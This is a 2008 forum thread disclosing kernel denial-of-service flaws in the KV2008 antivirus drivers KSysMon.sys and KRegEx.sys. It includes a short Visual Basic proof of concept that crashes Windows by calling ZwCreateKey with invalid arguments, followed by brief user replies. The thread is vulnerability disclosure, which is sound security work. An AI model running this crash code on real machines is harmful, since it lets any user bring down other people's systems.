查看: 4236|回复: 14
收起左侧

[江民] 江民杀毒软件 KV2008 KSysMon.sys 多处内核拒绝服务漏洞

[复制链接]
Heartstrings
发表于 2008-10-3 14:49:53 | 显示全部楼层 |阅读模式
江民杀毒软件 KV2008 (以下简称 KV2008) 是江民反病毒专家团队针对网络安全面临的新课题, 全新研发推出的计算机反病毒与网络安全防护软件, 号称是全球首家具有灾难恢复功能的智能主动防御杀毒软件。

令人遗憾的是, 其最新版本 11.00.800 (更新日期 2008-10-02) 及以下所有版本的驱动程序中存在多处内核拒绝服务漏洞, 可使任意权限的用户在安装 KV2008 的电脑上引发蓝屏, 造成灾难。

出问题的组件:

KSysMon.sys (CheckSum=0003AD80, TimeStamp=480D43E5)

KV2008 在对 KiFastCallEntry inline hook 时, 存在多处用户态传入参数不经检查即使用, 从而使得用户态传入无效参数即可引发系统崩溃, 蓝屏重启.

值得注意的是, KV2008 还注册了一个 DPC 定时恢复此钩子, 所以我们无法通过恢复此钩子避免该漏洞. 同时, KV2008 的 KRegEx.sys 在对 SSDT Hook 时, 存在多处同样的问题.

示例函数: NtCreateKey

函数 NtCreateKey 的原型是:

NTSTATUS
NtCreateKey(
OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG TitleIndex,
IN PUNICODE_STRING Class OPTIONAL,
IN ULONG CreateOptions,
OUT PULONG Disposition OPTIONAL
)

KV2008 在其 Hook 函数中, 没有任何检查地使用了用户态传入的 ObjectAttributes 参数, 这样, 如果我们传入一个无效的地址, 就会引发崩溃, 蓝屏重启.

测试代码:

Declare Function ZwCreateKey Lib "ntdll" (ByVal a As Long, ByVal b As Long, ByVal c As Long, ByVal d As Long, ByVal e As Long, ByVal f As Long, ByVal g As Long) As Long

Sub Main()
MsgBox "KV2008 内核漏洞演示 by iceboy"
ZwCreateKey 0, 0, 0, 0, 0, 0, 0
End Sub
wjzdw
发表于 2008-10-3 15:24:14 | 显示全部楼层
................不发表任何评论
西风萧雨
发表于 2008-10-3 17:24:50 | 显示全部楼层
不是吧?毒霸也发现漏洞,这下麻烦了~~·
我心约定
发表于 2008-10-3 17:53:58 | 显示全部楼层
楼主的信息来源是哪里?此信息我回尽快的反馈给江民研发中心. 谢谢支持!
天上人间
发表于 2008-10-3 18:33:13 | 显示全部楼层
无法发表评论
dl123100
发表于 2008-10-3 20:33:39 | 显示全部楼层
昨天就看到了,估计江民官方也早知道了。
来源:http://hi.baidu.com/iceboy_/blog ... bf7c087bec2cbd.html
xi889
头像被屏蔽
发表于 2008-10-3 20:40:54 | 显示全部楼层
怎么不挖掘一下国外杀软和HIPS的漏洞,都是国内的
godhua
发表于 2008-10-4 07:53:11 | 显示全部楼层
任何软件都有漏洞啊,都需要不停的升级再升级!
klnh
发表于 2008-10-4 11:27:14 | 显示全部楼层
嗯,查证一下去
jiffy
发表于 2008-10-4 11:41:51 | 显示全部楼层
这下真麻烦了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-24 05:47 , Processed in 0.137357 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表